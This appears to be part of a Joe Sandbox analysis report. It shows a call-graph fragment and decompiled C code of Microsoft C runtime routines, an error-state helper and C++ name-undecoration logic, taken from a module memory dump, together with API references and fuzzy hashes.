6196->6197 6198 7ffc235664b0 _CallSETranslator 13 API calls 6197->6198 6199 7ffc2356feb4 6198->6199 6200 7ffc23563bbc 43 API calls 6199->6200 6201 7ffc2356fef5 6200->6201 6202 7ffc235664b0 _CallSETranslator 13 API calls 6201->6202 6203 7ffc2356fefa 6202->6203 6528 7ffc23564601 6529 7ffc235664b0 _CallSETranslator 13 API calls 6528->6529 6530 7ffc2356460e 6529->6530 6531 7ffc235664b0 _CallSETranslator 13 API calls 6530->6531 6533 7ffc23564617 __CxxCallCatchBlock 6531->6533 6532 7ffc2356465e RaiseException 6534 7ffc2356467d 6532->6534 6533->6532 6535 7ffc2356eff0 __CxxCallCatchBlock 14 API calls 6534->6535 6539 7ffc23564685 6535->6539 6536 7ffc235646ae __CxxCallCatchBlock 6537 7ffc235664b0 _CallSETranslator 13 API calls 6536->6537 6538 7ffc235646c1 6537->6538 6540 7ffc235664b0 _CallSETranslator 13 API calls 6538->6540 6539->6536 6541 7ffc235620f0 __CxxCallCatchBlock 13 API calls 6539->6541 6542 7ffc235646ca 6540->6542 6541->6536 6543 7ffc235664b0 _CallSETranslator 13 API calls 6542->6543 6544 7ffc235646d3 6543->6544 6545 7ffc235664b0 _CallSETranslator 13 API calls 6544->6545 6546 7ffc235646e2 6545->6546 6204 7ffc23566980 6205 7ffc23566989 6204->6205 6206 7ffc23566994 abort 6205->6206 6547 7ffc23566000 InterlockedFlushSList 6548 7ffc23566011 free 6547->6548 6549 7ffc23566025 6547->6549 6548->6548 6548->6549 6550 7ffc2356fd03 6551 7ffc2356eff0 __CxxCallCatchBlock 14 API calls 6550->6551 6556 7ffc2356fd16 6551->6556 6552 7ffc2356fd47 __CxxCallCatchBlock 6553 7ffc235664b0 _CallSETranslator 13 API calls 6552->6553 6554 7ffc2356fd5b 6553->6554 6555 7ffc235664b0 _CallSETranslator 13 API calls 6554->6555 6557 7ffc2356fd68 6555->6557 6556->6552 6558 7ffc235620f0 __CxxCallCatchBlock 13 API calls 6556->6558 6559 7ffc235664b0 _CallSETranslator 13 API calls 6557->6559 6558->6552 6560 7ffc2356fd75 6559->6560 6207 7ffc2356287e abort 6208 7ffc2356fd86 6209 7ffc23562160 14 API calls 6208->6209 6210 7ffc2356fd94 6209->6210 6211 7ffc23562290 terminate 6561 7ffc23561910 6563 7ffc23561924 __except_validate_jump_buffer 6561->6563 6562 7ffc2356f9be RtlUnwind 6562->6562 6563->6562 6567 7ffc2356ff13 6568 7ffc235664b0 _CallSETranslator 13 API calls 6567->6568 6569 7ffc2356ff2a 6568->6569 6570 7ffc235664b0 _CallSETranslator 13 API calls 6569->6570 6571 7ffc2356ff45 6570->6571 6572 7ffc235664b0 _CallSETranslator 13 API calls 6571->6572 6573 7ffc2356ff4e 6572->6573 6574 7ffc23563de4 38 API calls 6573->6574 6575 7ffc2356ff94 6574->6575 6576 7ffc235664b0 _CallSETranslator 13 API calls 6575->6576 6577 7ffc2356ff99 6576->6577 6578 7ffc2356f510 6580 7ffc2356f552 __GSHandlerCheckCommon 6578->6580 6579 7ffc2356f57a 6580->6579 6581 7ffc2356e340 __C_specific_handler RtlUnwindEx 6580->6581 6581->6579

                                                    Control-flow Graph

                                                    C-Code - Quality: 60%
                                                    			E00007FFC7FFC235664CC(void* __rax, long long __rbx, signed int __rdx, long long __rsi, long long _a8, long long _a16) {
                                                    				void* _t12;
                                                    				intOrPtr _t14;
                                                    				intOrPtr _t16;
                                                    				intOrPtr _t17;
                                                    
                                                    				_a8 = __rbx;
                                                    				_a16 = __rsi;
                                                    				if ( *0x23574000 != 0xffffffff) goto 0x235664eb;
                                                    				goto 0x2356657d;
                                                    				GetLastError();
                                                    				E00007FFC7FFC2356682C();
                                                    				if (__rax == (__rdx | 0xffffffff)) goto 0x23566572;
                                                    				if (__rax == 0) goto 0x23566513;
                                                    				goto 0x23566572;
                                                    				_t14 =  *0x23574000; // 0x5
                                                    				if (E00007FFC7FFC23566874(_t14, __rax, __rax, __rbx, __rdx | 0xffffffff) == 0) goto 0x23566572;
                                                    				calloc(??, ??);
                                                    				_t16 =  *0x23574000; // 0x5
                                                    				if (__rax == 0) goto 0x23566562;
                                                    				if (E00007FFC7FFC23566874(_t16, __rax, __rax, __rax, __rax) == 0) goto 0x2356655c;
                                                    				 *((intOrPtr*)(__rax + 0x78)) = 0xfffffffe;
                                                    				goto 0x23566569;
                                                    				_t17 =  *0x23574000; // 0x5
                                                    				_t12 = E00007FFC7FFC23566874(_t17, 0, __rax, __rax, __rax);
                                                    				free(??);
                                                    				SetLastError(??);
                                                    				return _t12;
                                                    			}







                                                    0x7ffc235664cc
                                                    0x7ffc235664d1
                                                    0x7ffc235664e2
                                                    0x7ffc235664e6
                                                    0x7ffc235664eb
                                                    0x7ffc235664f9
                                                    0x7ffc23566507
                                                    0x7ffc2356650c
                                                    0x7ffc23566511
                                                    0x7ffc23566513
                                                    0x7ffc23566520
                                                    0x7ffc2356652a
                                                    0x7ffc23566530
                                                    0x7ffc2356653c
                                                    0x7ffc23566548
                                                    0x7ffc2356654d
                                                    0x7ffc2356655a
                                                    0x7ffc2356655c
                                                    0x7ffc23566564
                                                    0x7ffc2356656c
                                                    0x7ffc23566574
                                                    0x7ffc2356658c

                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,?,00007FFC23566359,?,?,?,?,00007FFC2356F222,?,?,?,?,?), ref: 00007FFC235664EB
                                                    • SetLastError.KERNEL32(?,?,?,00007FFC23566359,?,?,?,?,00007FFC2356F222,?,?,?,?,?), ref: 00007FFC23566574
                                                    Memory Dump Source
                                                    • Source File: 00000027.00000002.345809709.00007FFC23561000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFC23560000, based on PE: true
                                                    • Associated: 00000027.00000002.345802537.00007FFC23560000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345852128.00007FFC23574000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345858884.00007FFC23575000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345905892.00007FFC23577000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_39_2_7ffc23560000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID:
                                                    • API String ID: 1452528299-0
                                                    • Opcode ID: 2b99468ace53b58ec4e2ce54daba43a8db158de3e52ec82cde71c4580836b028
                                                    • Instruction ID: ca88a0d7554c41aeedf2834326f19e344ef92b6355ec6f14f31fac7c07655d25
                                                    • Opcode Fuzzy Hash: 2b99468ace53b58ec4e2ce54daba43a8db158de3e52ec82cde71c4580836b028
                                                    • Instruction Fuzzy Hash: 06117220F0922A82FA50C721EC5513926E1FF48BA0F4446B4D96E673E9DE2CE841CA20
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 82%
                                                    			E00007FFC7FFC235672A8(signed int __rbx, signed int* __rcx, intOrPtr* __rdx) {
                                                    				void* __rdi;
                                                    				void* __rsi;
                                                    				void* __r12;
                                                    				void* __r14;
                                                    				intOrPtr _t426;
                                                    				signed int _t464;
                                                    				signed int _t471;
                                                    				signed long long _t503;
                                                    				intOrPtr _t511;
                                                    				unsigned int _t521;
                                                    				unsigned int _t530;
                                                    				unsigned int _t539;
                                                    				signed int _t556;
                                                    				unsigned int _t576;
                                                    				unsigned int _t588;
                                                    				signed int _t601;
                                                    				signed int _t610;
                                                    				signed int _t623;
                                                    				signed int _t624;
                                                    				signed int _t626;
                                                    				unsigned int _t633;
                                                    				signed int _t639;
                                                    				unsigned int _t641;
                                                    				signed int _t656;
                                                    				signed int _t693;
                                                    				signed int _t695;
                                                    				signed int _t698;
                                                    				signed int _t699;
                                                    				void* _t704;
                                                    				void* _t709;
                                                    				void* _t777;
                                                    				void* _t781;
                                                    				void* _t785;
                                                    				void* _t788;
                                                    				void* _t789;
                                                    				signed int _t792;
                                                    				signed int _t793;
                                                    				signed int _t797;
                                                    				signed long long _t800;
                                                    				signed long long _t802;
                                                    				signed long long _t807;
                                                    				signed long long _t808;
                                                    				signed long long* _t809;
                                                    				signed long long* _t812;
                                                    				signed long long* _t815;
                                                    				signed long long _t819;
                                                    				signed long long _t836;
                                                    				signed long long _t837;
                                                    				signed long long* _t838;
                                                    				signed long long* _t839;
                                                    				void* _t842;
                                                    				signed long long _t860;
                                                    				signed long long _t864;
                                                    				signed long long* _t865;
                                                    				signed long long _t869;
                                                    				void* _t909;
                                                    				void* _t994;
                                                    				void* _t996;
                                                    				long long* _t997;
                                                    				void* _t999;
                                                    				void* _t1000;
                                                    				void* _t1002;
                                                    				void* _t1003;
                                                    				void* _t1031;
                                                    				void* _t1032;
                                                    				void* _t1033;
                                                    				void* _t1035;
                                                    				void* _t1037;
                                                    				void* _t1039;
                                                    				intOrPtr* _t1040;
                                                    				signed long long _t1043;
                                                    
                                                    				 *((long long*)(_t1002 + 8)) = __rbx;
                                                    				_t1000 = _t1002 - 0x20;
                                                    				_t1003 = _t1002 - 0x120;
                                                    				_t426 =  *0x23574360; // 0x0
                                                    				_t1040 = __rdx;
                                                    				 *(_t1003 + 0x40) =  *(_t1003 + 0x40) & 0x00000000;
                                                    				_t997 = __rcx;
                                                    				 *((intOrPtr*)(_t1000 - 0x68)) = _t426 -  *0x23574368;
                                                    				 *(_t1003 + 0x48) = 0;
                                                    				_t699 = E00007FFC7FFC2356D0D4(__rcx, _t1031, _t1032);
                                                    				if ( *__rdx == 0) goto 0x23567307;
                                                    				if (( *(__rdx + 8) & 0x00000200) == 0) goto 0x23567307;
                                                    				 *(_t1000 + 0x78) = 1;
                                                    				goto 0x2356730a;
                                                    				 *(_t1000 + 0x78) =  *(_t1000 + 0x78) & 0;
                                                    				if (_t699 != 0xffff) goto 0x23567321;
                                                    				__rcx[2] = __rcx[2] & 0;
                                                    				 *__rcx =  *__rcx & __rbx;
                                                    				__rcx[2] = 2;
                                                    				goto 0x2356812f;
                                                    				if (_t699 != 0xfffe) goto 0x2356734e;
                                                    				 *(_t1003 + 0x58) =  *(_t1003 + 0x58) & 0;
                                                    				_t1005 = __rdx;
                                                    				 *(_t1003 + 0x50) = 0x23571ac0;
                                                    				_t842 = _t1003 + 0x50;
                                                    				E00007FFC7FFC23566F74(_t842, __rcx, __rdx);
                                                    				goto 0x2356812f;
                                                    				_t704 = _t699 - 0xfffd;
                                                    				if (_t704 != 0) goto 0x23567362;
                                                    				 *_t997 = 0x23571ac0;
                                                    				goto 0x2356812c;
                                                    				r14d = _t699;
                                                    				r13d = 0x6000;
                                                    				r14d = r14d & 0x00008000;
                                                    				if (_t704 == 0) goto 0x23567bf9;
                                                    				r12d = _t699;
                                                    				r12d = r12d & 0x00001800;
                                                    				r13d = 0x1000;
                                                    				 *(_t1000 + 0x70) = 0 | r12d == 0x00000800;
                                                    				 *(_t1000 + 0x68) = 0 | (r13d & _t699) == 0x00000000;
                                                    				r13d =  ==  ? 0x400 : r13d;
                                                    				r13d = r13d & _t699;
                                                    				 *(_t1000 - 0x6c) = r13d;
                                                    				if (r12d == 0x800) goto 0x235673dc;
                                                    				_t30 = _t842 - 0x1000; // -4096
                                                    				if ((_t30 & 0xfffffcff) != 0) goto 0x235673dc;
                                                    				_t709 = (_t699 & 0x00001b00) - 0x1300;
                                                    				if (_t709 != 0) goto 0x23567bf3;
                                                    				asm("bt edi, 0xe");
                                                    				if (_t709 >= 0) goto 0x23567453;
                                                    				_t633 =  *0x23574370; // 0x0
                                                    				if (( !((_t633 >> 0x00000002 |  *0x23574370) >> 1) & 0x00000001) == 0) goto 0x23567440;
                                                    				E00007FFC7FFC235687A0( !((_t633 >> 0x00000002 |  *0x23574370) >> 1), _t699,  !((_t633 >> 0x00000002 |  *0x23574370) >> 1) & 0x00000001, 0x23571ac0, __rbx, _t1003 + 0x30, _t997, _t1005, _t1039);
                                                    				 *(_t1003 + 0x70) =  *(_t1003 + 0x70) & 0x00000000;
                                                    				 *(_t1003 + 0x78) =  *(_t1003 + 0x78) & 0x00000000;
                                                    				E00007FFC7FFC23568150(0x20, 0x23571ac0, 0x23571ac0, _t1003 + 0x70);
                                                    				E00007FFC7FFC23566F74(_t1003 + 0x70, _t1003 + 0x50, 0x23571ac0);
                                                    				_t800 =  *(_t1003 + 0x50);
                                                    				 *(_t1003 + 0x40) = _t800;
                                                    				goto 0x2356744f;
                                                    				E00007FFC7FFC235687A0( !((_t633 >> 0x00000002 |  *0x23574370) >> 1), _t699,  !((_t633 >> 0x00000002 |  *0x23574370) >> 1) & 0x00000001, _t800, 0x23571ac0, _t1003 + 0x70, _t997, 0x23571ac0, _t1037);
                                                    				if ( *(_t800 + 8) - 1 <= 0) goto 0x23567453;
                                                    				 *(_t1003 + 0x48) =  *(_t800 + 8) & 0x000000ff;
                                                    				if (r13d == 0) goto 0x235675df;
                                                    				if (r12d != 0x1800) goto 0x235675df;
                                                    				r8b = 0x7b;
                                                    				E00007FFC7FFC23566FA0(_t1040, _t1003 + 0x50);
                                                    				_t836 = _t800;
                                                    				E00007FFC7FFC23569BAC(0, _t836, _t1003 + 0x30, _t994, _t997, _t1031, _t1032, _t1037);
                                                    				E00007FFC7FFC23566F74(_t836, _t1003 + 0x70, _t1003 + 0x30);
                                                    				E00007FFC7FFC23567078(0, _t1003 + 0x40, _t800, _t1003 + 0x30);
                                                    				E00007FFC7FFC2356D59C(_t1003 + 0x30);
                                                    				if (( *0x23574370 & 0x00001000) != 0) goto 0x2356752b;
                                                    				 *(_t1003 + 0x70) =  *(_t1003 + 0x70) & 0x00000000;
                                                    				 *(_t1003 + 0x78) =  *(_t1003 + 0x78) & 0x00000000;
                                                    				 *(_t1003 + 0x50) = "}\' ";
                                                    				r13d = 3;
                                                    				 *(_t1003 + 0x58) = r13d;
                                                    				asm("movaps xmm0, [esp+0x50]");
                                                    				asm("movdqa [esp+0x50], xmm0");
                                                    				E00007FFC7FFC23568150(0x2c, "}\' ", _t836, _t1003 + 0x70);
                                                    				_t65 = _t1000 - 0x50; // -77
                                                    				E00007FFC7FFC23566F74(_t1003 + 0x70, _t65, _t1003 + 0x30);
                                                    				_t68 = _t1000 - 0x40; // -61
                                                    				_t69 = _t1000 - 0x50; // -77
                                                    				E00007FFC7FFC23566F48(_t69, _t68, _t1003 + 0x50);
                                                    				E00007FFC7FFC23567078(0, _t1003 + 0x40, "}\' ", _t1003 + 0x50);
                                                    				_t802 = "}\'";
                                                    				 *(_t1003 + 0x58) = 2;
                                                    				 *(_t1003 + 0x50) = _t802;
                                                    				asm("movaps xmm0, [esp+0x50]");
                                                    				asm("movdqa [esp+0x30], xmm0");
                                                    				E00007FFC7FFC23566FF8(0x2c, _t699, _t802, _t836, _t1003 + 0x40, _t1003 + 0x30, _t997);
                                                    				E00007FFC7FFC23568DDC(_t836, _t1003 + 0x30, _t994, _t997, _t1035, _t1033);
                                                    				_t639 =  *0x23574370; // 0x0
                                                    				if (( !(_t639 >> 1) & 0x00000001) == 0) goto 0x235675d7;
                                                    				if (( !(_t639 >> 4) & 0x00000001) == 0) goto 0x235675d7;
                                                    				if ((0x00001000 & _t639) != 0) goto 0x235675d7;
                                                    				 *(_t1003 + 0x70) =  *(_t1003 + 0x70) & 0x00000000;
                                                    				 *(_t1003 + 0x78) =  *(_t1003 + 0x78) & 0x00000000;
                                                    				E00007FFC7FFC23568150(0x20, _t802, _t836, _t1003 + 0x70);
                                                    				E00007FFC7FFC23566F74(_t1003 + 0x70, _t1003 + 0x50, _t1003 + 0x30);
                                                    				r8b = 0x20;
                                                    				_t90 = _t1000 - 0x50; // -77
                                                    				E00007FFC7FFC23566FA0(_t1003 + 0x50, _t90);
                                                    				_t860 = _t802;
                                                    				_t93 = _t1000 - 0x40; // -61
                                                    				E00007FFC7FFC23566F74(_t860, _t93, _t1003 + 0x40);
                                                    				goto 0x23567e59;
                                                    				goto 0x23567e68;
                                                    				 *(_t1000 - 0x40) = _t860;
                                                    				 *(_t1000 - 0x38) = _t639;
                                                    				 *(_t1000 - 0x50) = _t860;
                                                    				 *(_t1000 - 0x48) = _t639;
                                                    				 *(_t1000 - 0x60) = _t860;
                                                    				 *(_t1000 - 0x58) = _t639;
                                                    				 *(_t1003 + 0x70) = _t860;
                                                    				 *(_t1003 + 0x78) = _t639;
                                                    				 *(_t1000 - 0x30) = _t860;
                                                    				 *(_t1000 - 0x28) = _t639;
                                                    				if (r13d == 0) goto 0x235676a1;
                                                    				if (r12d != 0x800) goto 0x23567681;
                                                    				if ((_t699 & 0x00000700) != 0x600) goto 0x2356765e;
                                                    				E00007FFC7FFC23569BAC(1, _t836, _t1003 + 0x50, _t994, _t997, _t1031, _t1032, _t1037);
                                                    				 *(_t1000 - 0x40) =  *(_t1003 + 0x50);
                                                    				 *(_t1000 - 0x38) =  *(_t1003 + 0x58);
                                                    				E00007FFC7FFC23569BAC(1, _t836, _t1003 + 0x50, _t994, _t997, _t1031, _t1032, _t1037);
                                                    				 *(_t1000 - 0x50) =  *(_t1003 + 0x50);
                                                    				_t464 =  *(_t1003 + 0x58);
                                                    				 *(_t1000 - 0x48) = _t464;
                                                    				goto 0x23567665;
                                                    				if (_t464 != 0x500) goto 0x23567681;
                                                    				E00007FFC7FFC23569BAC(1, _t836, _t1003 + 0x50, _t994, _t997, _t1031, _t1032, _t1037);
                                                    				 *(_t1000 - 0x60) =  *(_t1003 + 0x50);
                                                    				 *(_t1000 - 0x58) =  *(_t1003 + 0x58);
                                                    				_t864 = _t1003 + 0x50;
                                                    				E00007FFC7FFC23569BAC(1, _t836, _t864, _t994, _t997, _t1031, _t1032, _t1037);
                                                    				 *(_t1003 + 0x70) =  *(_t1003 + 0x50);
                                                    				 *(_t1003 + 0x78) =  *(_t1003 + 0x58);
                                                    				if (r12d != 0x800) goto 0x2356772f;
                                                    				if ((_t699 & 0x00000700) == 0x200) goto 0x2356772f;
                                                    				_t471 =  *0x23574370; // 0x0
                                                    				r8d = 0;
                                                    				 *(_t1003 + 0x50) = _t864;
                                                    				 *(_t1003 + 0x58) = 0;
                                                    				 *(_t1003 + 0x20) = 1;
                                                    				if ((_t471 & 0x00000060) == 0x60) goto 0x23567706;
                                                    				 *(_t1000 - 0x80) = _t864;
                                                    				 *(_t1000 - 0x78) = 0;
                                                    				_t132 = _t1000 - 0x80; // 0xf80
                                                    				_t865 = _t1003 + 0x30;
                                                    				E00007FFC7FFC23568F1C(_t699, _t836, _t865, _t132, _t994, _t997, _t1003 + 0x50);
                                                    				_t807 =  *(_t1003 + 0x30);
                                                    				 *(_t1000 - 0x30) = _t807;
                                                    				goto 0x2356772c;
                                                    				 *(_t1003 + 0x30) = _t865;
                                                    				 *(_t1003 + 0x38) = 0;
                                                    				_t141 = _t1000 - 0x80; // 0xf80
                                                    				E00007FFC7FFC23568F1C(_t699, _t836, _t141, _t1003 + 0x50, _t994, _t997, _t1003 + 0x30);
                                                    				if ( *(_t1000 - 0x78) - 1 <= 0) goto 0x2356772f;
                                                    				 *(_t1000 - 0x28) =  *(_t1000 - 0x78) & 0x000000ff;
                                                    				_t641 =  *0x23574370; // 0x0
                                                    				r13d = 3;
                                                    				if (( !(_t641 >> 1) & 0x00000001) == 0) goto 0x235677fa;
                                                    				_t643 =  !(_t641 >> 4);
                                                    				if (( !(_t641 >> 4) & 0x00000001) == 0) goto 0x235677d1;
                                                    				E00007FFC7FFC23568DDC(_t836, _t1003 + 0x30, _t994, _t997, _t994, _t996);
                                                    				E00007FFC7FFC23566F74(_t807, _t1003 + 0x50, _t1003 + 0x40);
                                                    				_t869 =  *_t807;
                                                    				 *(_t1003 + 0x40) = _t869;
                                                    				 *(_t1003 + 0x48) =  *(_t807 + 8);
                                                    				_t808 =  *_t1040;
                                                    				if (_t808 == 0) goto 0x2356780e;
                                                    				if (_t869 == 0) goto 0x23567801;
                                                    				if (( *0x23574370 & 0x00001000) != 0) goto 0x23567801;
                                                    				 *(_t1000 - 0x80) = _t836;
                                                    				_t158 = _t1000 - 0x80; // -125
                                                    				 *(_t1000 - 0x78) = 0;
                                                    				E00007FFC7FFC23568150(0x20, _t808, _t836, _t158);
                                                    				_t161 = _t1000 - 0x80; // -125
                                                    				E00007FFC7FFC23566F74(_t161, _t1003 + 0x30, _t1040);
                                                    				E00007FFC7FFC23567078( !(_t641 >> 4), _t1003 + 0x40, _t1003 + 0x30, _t1040);
                                                    				goto 0x2356780e;
                                                    				E00007FFC7FFC23568DDC(_t836, _t1003 + 0x40, _t994, _t997);
                                                    				if ( *(_t1003 + 0x48) == r13b) goto 0x2356777e;
                                                    				if ( *(_t808 + 8) - 1 <= 0) goto 0x2356777e;
                                                    				 *(_t1003 + 0x48) = 0;
                                                    				goto 0x2356777e;
                                                    				goto 0x235677d1;
                                                    				 *(_t1003 + 0x40) = _t808;
                                                    				 *(_t1003 + 0x48) =  *(_t1040 + 8);
                                                    				 *(_t1000 - 0x80) = _t836;
                                                    				 *(_t1000 - 0x70) = 0;
                                                    				if ( *(_t1000 + 0x78) == (0 |  *(_t808 + 8) & 0x000000ff)) goto 0x2356792c;
                                                    				_t176 = _t1000 - 0x10; // -13
                                                    				E00007FFC7FFC2356BC4C(_t699, _t176, _t994);
                                                    				 *(_t1003 + 0x50) =  *(_t1003 + 0x50) & _t836;
                                                    				 *(_t1003 + 0x58) =  *(_t1003 + 0x58) & r15d;
                                                    				_t837 = _t808;
                                                    				E00007FFC7FFC23568150(0x20, _t808, _t837, _t1003 + 0x50);
                                                    				E00007FFC7FFC23566F74(_t1003 + 0x50, _t1003 + 0x30, _t837);
                                                    				E00007FFC7FFC23567078( !(_t641 >> 4), _t1003 + 0x40, _t1003 + 0x30, _t837);
                                                    				if (( *0x23574370 & 0x00001000) != 0) goto 0x23568120;
                                                    				if ( *(_t1000 - 0x6c) == 0) goto 0x23567a3f;
                                                    				if (r12d != 0x800) goto 0x235679d4;
                                                    				if ((_t699 & 0x00000700) != 0x600) goto 0x2356796e;
                                                    				 *(_t1003 + 0x38) = 0xc;
                                                    				_t809 = "`vtordispex{";
                                                    				 *(_t1003 + 0x30) = _t809;
                                                    				asm("movaps xmm0, [esp+0x30]");
                                                    				_t192 = _t1000 - 0x10; // -13
                                                    				asm("movdqa [esp+0x30], xmm0");
                                                    				E00007FFC7FFC23566CF4(_t809, _t192, _t1003 + 0x30);
                                                    				_t193 = _t1000 - 0x40; // -61
                                                    				E00007FFC7FFC23566F74(_t809, _t1003 + 0x30, _t193);
                                                    				r8b = 0x2c;
                                                    				E00007FFC7FFC23566FA0(_t1003 + 0x30, _t1003 + 0x50);
                                                    				_t197 = _t1000 - 0x50; // -77
                                                    				E00007FFC7FFC23566F74(_t809, _t1000, _t197);
                                                    				r8b = 0x2c;
                                                    				_t198 = _t1000 + 0x10; // 0x13
                                                    				E00007FFC7FFC23566FA0(_t809, _t198);
                                                    				_t199 = _t1000 - 0x60; // -93
                                                    				_t200 = _t1000 - 0x20; // -29
                                                    				E00007FFC7FFC23566F74(_t809, _t200, _t199);
                                                    				goto 0x235679bd;
                                                    				E00007FFC7FFC2356AA78(_t809, _t837, 0x23574388, _t1003 + 0x60, _t997, _t999);
                                                    				if (_t809 == 0) goto 0x2356794d;
                                                    				 *_t809 = _t837;
                                                    				_t809[1] = 0;
                                                    				goto 0x23567950;
                                                    				_t1043 = _t837;
                                                    				_t203 = _t1000 - 0x10; // -13
                                                    				E00007FFC7FFC2356BC4C(_t699, _t203, _t994);
                                                    				_t503 = _t809[1];
                                                    				 *(_t1000 - 0x80) =  *_t809;
                                                    				 *(_t1000 - 0x70) = _t503;
                                                    				goto 0x23567878;
                                                    				if (_t503 != 0x500) goto 0x235679d4;
                                                    				 *(_t1003 + 0x38) = 0xa;
                                                    				 *(_t1003 + 0x30) = "`vtordisp{";
                                                    				asm("movaps xmm0, [esp+0x30]");
                                                    				asm("movdqa [esp+0x30], xmm0");
                                                    				E00007FFC7FFC23566CF4("`vtordisp{", _t1003 + 0x60, _t1003 + 0x30);
                                                    				_t211 = _t1000 - 0x60; // -93
                                                    				E00007FFC7FFC23566F74("`vtordisp{", _t1003 + 0x30, _t211);
                                                    				_t213 = _t1000 - 0x20; // -29
                                                    				r8b = 0x2c;
                                                    				E00007FFC7FFC23566FA0(_t1003 + 0x30, _t213);
                                                    				E00007FFC7FFC23567078( !(_t641 >> 4), _t1003 + 0x40, "`vtordisp{", _t211);
                                                    				goto 0x23567a02;
                                                    				 *(_t1003 + 0x38) = 0xa;
                                                    				 *(_t1003 + 0x30) = "`adjustor{";
                                                    				asm("movaps xmm0, [esp+0x30]");
                                                    				asm("movdqa [esp+0x30], xmm0");
                                                    				E00007FFC7FFC23566FF8(0x10, _t699, "`adjustor{", _t837, _t1003 + 0x40, _t1003 + 0x30, _t997);
                                                    				 *(_t1003 + 0x38) = r13d;
                                                    				_t812 = "}\' ";
                                                    				 *(_t1003 + 0x30) = _t812;
                                                    				asm("movaps xmm0, [esp+0x30]");
                                                    				asm("movdqa [esp+0x30], xmm0");
                                                    				E00007FFC7FFC23566F48(_t1003 + 0x70, _t1003 + 0x60, _t1003 + 0x30);
                                                    				E00007FFC7FFC23567078( !(_t641 >> 4), _t1003 + 0x40, _t812, _t1003 + 0x30);
                                                    				if ( *0x23574384 != 1) goto 0x23567a5a;
                                                    				_t511 =  *0x23574380; // 0x0
                                                    				_t512 =  ==  ?  *((void*)(_t1000 - 0x68)) : _t511;
                                                    				 *0x23574380 =  ==  ?  *((void*)(_t1000 - 0x68)) : _t511;
                                                    				E00007FFC7FFC23568334(_t837, _t1003 + 0x60, _t812, _t997, _t1003 + 0x30);
                                                    				 *(_t1003 + 0x50) =  *(_t1003 + 0x50) & 0x00000000;
                                                    				 *(_t1003 + 0x58) =  *(_t1003 + 0x58) & 0x00000000;
                                                    				_t838 = _t812;
                                                    				E00007FFC7FFC23568150(0x28, _t812, _t838, _t1003 + 0x50);
                                                    				_t1020 = _t838;
                                                    				E00007FFC7FFC23566F74(_t1003 + 0x50, _t1003 + 0x30, _t838);
                                                    				r8b = 0x29;
                                                    				_t235 = _t1000 - 0x20; // -29
                                                    				E00007FFC7FFC23566FA0(_t1003 + 0x30, _t235);
                                                    				E00007FFC7FFC23567078( !(_t641 >> 4), _t1003 + 0x40, _t812, _t838);
                                                    				if (r12d != 0x800) goto 0x23567ad3;
                                                    				if ((_t699 & 0x00000700) == 0x200) goto 0x23567ad3;
                                                    				_t238 = _t1000 - 0x30; // -45
                                                    				E00007FFC7FFC23567078(_t643, _t1003 + 0x40, _t238, _t838);
                                                    				_t521 =  *0x23574370; // 0x0
                                                    				if ((0x00000001 &  !(_t521 >> 0x13)) == 0) goto 0x23567b00;
                                                    				E00007FFC7FFC2356BA80(1, _t643, _t699, _t838, _t1003 + 0x60, _t994, _t997);
                                                    				E00007FFC7FFC23567078(_t643, _t1003 + 0x40, _t812, _t838);
                                                    				goto 0x23567b25;
                                                    				E00007FFC7FFC2356BA80(1, _t643, _t699, _t838, _t1003 + 0x40, _t994, _t997);
                                                    				if ( *(_t1003 + 0x48) == r13b) goto 0x23567b25;
                                                    				if (_t812[1] - 1 <= 0) goto 0x23567b25;
                                                    				 *(_t1003 + 0x48) =  *(_t1003 + 0x48) & 0xffffff00 | _t812[1] & 0x000000ff;
                                                    				E00007FFC7FFC2356AB08(_t1003 + 0x60);
                                                    				E00007FFC7FFC23567078( *(_t1003 + 0x48) & 0xffffff00 | _t812[1] & 0x000000ff, _t1003 + 0x40, _t812, _t838);
                                                    				_t530 =  *0x23574370; // 0x0
                                                    				if ((0x00000001 &  !(_t530 >> 8)) == 0) goto 0x23567b64;
                                                    				E00007FFC7FFC2356D0B0(_t1003 + 0x60);
                                                    				E00007FFC7FFC23567078( *(_t1003 + 0x48) & 0xffffff00 | _t812[1] & 0x000000ff, _t1003 + 0x40, _t812, _t838);
                                                    				goto 0x23567b89;
                                                    				E00007FFC7FFC2356D0B0(_t1003 + 0x40);
                                                    				if ( *(_t1003 + 0x48) == r13b) goto 0x23567b89;
                                                    				if (_t812[1] - 1 <= 0) goto 0x23567b89;
                                                    				 *(_t1003 + 0x48) =  *(_t1003 + 0x48) & 0xffffff00 | _t812[1] & 0x000000ff;
                                                    				E00007FFC7FFC23569CF8(_t812[1] & 0x000000ff, _t1003 + 0x60);
                                                    				if ( *(_t1003 + 0x48) == r13b) goto 0x23567bb3;
                                                    				if (_t812[1] - 1 <= 0) goto 0x23567bb3;
                                                    				 *(_t1003 + 0x48) =  *(_t1003 + 0x48) & 0xffffff00 | _t812[1] & 0x000000ff;
                                                    				_t539 =  *0x23574370; // 0x0
                                                    				if ((0x00000001 &  !(_t539 >> 2)) == 0) goto 0x235675d7;
                                                    				if (_t1043 == 0) goto 0x235675d7;
                                                    				 *_t1043 =  *(_t1003 + 0x40);
                                                    				 *(_t1043 + 8) =  *(_t1003 + 0x48);
                                                    				 *(_t1003 + 0x40) =  *(_t1000 - 0x80);
                                                    				goto 0x23567e64;
                                                    				r13d = 0x6000;
                                                    				_t909 = _t1003 + 0x40;
                                                    				E00007FFC7FFC23567078( *(_t1003 + 0x48) & 0xffffff00 | _t812[1] & 0x000000ff, _t909, _t1043, _t838);
                                                    				r9d = 0x7c00;
                                                    				if (r14d != 0) goto 0x23567ca4;
                                                    				_t276 = _t909 - 0x6800; // -26624
                                                    				if ((_t276 & 0xfffff7ff) != 0) goto 0x23567c39;
                                                    				E00007FFC7FFC2356D854(0x28, _t699, _t838, _t997, _t1003 + 0x40, _t994, _t997, _t1020, _t1031, _t1032, _t1033);
                                                    				goto 0x2356812f;
